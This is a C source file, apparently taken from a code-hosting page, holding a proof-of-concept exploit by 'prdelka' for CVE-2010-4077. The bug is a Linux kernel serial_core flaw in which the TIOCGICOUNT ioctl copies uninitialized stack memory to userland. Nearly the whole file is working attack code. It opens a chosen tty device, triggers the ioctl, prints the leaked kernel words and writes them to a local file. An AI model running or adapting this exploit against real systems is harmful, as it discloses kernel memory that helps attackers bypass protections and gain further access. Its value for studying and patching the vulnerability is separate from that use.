52 lines
No EOL
1.5 KiB
C
52 lines
No EOL
1.5 KiB
C
/* Linux <= 2.6.37-rc1 serial_core TIOCGICOUNT leak
|
|
* ================================================
|
|
* Information leak exploit for CVE-2010-4077 which
|
|
* leaks kernel stack space back to userland due to
|
|
* uninitialized struct member "reserved" in struct
|
|
* serial_icounter_struct copied to userland. uses
|
|
* ioctl to trigger memory leak, dumps to file and
|
|
* displays to command line.
|
|
*
|
|
* -- prdelka
|
|
*
|
|
*/
|
|
#include <termios.h>
|
|
#include <fcntl.h>
|
|
#include <sys/ioctl.h>
|
|
#include <linux/serial.h>
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <string.h>
|
|
|
|
int main(int argc, char* argv[]) {
|
|
int fd, ret = 0, i;
|
|
struct serial_icounter_struct buffer;
|
|
printf("[ Linux <= 2.6.37-rc1 serial_core TIOCGICOUNT leak exploit\n");
|
|
if(argc < 2){
|
|
printf("[ You need to supply a device name e.g. /dev/ttyS0\n");
|
|
exit(-1);
|
|
};
|
|
memset(&buffer,0,sizeof(buffer));
|
|
if((fd = open(argv[1], O_RDONLY)) == -1){
|
|
printf("[ Couldn't open %s\n",argv[1]);
|
|
exit(-1);
|
|
}
|
|
if((ioctl(fd, TIOCGICOUNT, &buffer)) == -1){
|
|
printf("[ Problem with ioctl() request\n");
|
|
exit(-1);
|
|
}
|
|
close(fd);
|
|
for(i=0;i<=9;i++){
|
|
printf("[ int leak[%d]: %x\n",i,buffer.reserved[i]);
|
|
};
|
|
if((fd = open("./leak", O_RDWR | O_CREAT, 0640)) == -1){
|
|
printf("[ Can't open file to write memory out\n");
|
|
exit(-1);
|
|
}
|
|
for(i=0;i<=9;i++){
|
|
ret += write(fd,&buffer.reserved[i],sizeof(int));
|
|
}
|
|
close(fd);
|
|
printf("[ Written %d leaked bytes to ./leak\n",ret);
|
|
exit(0);
|
|
} |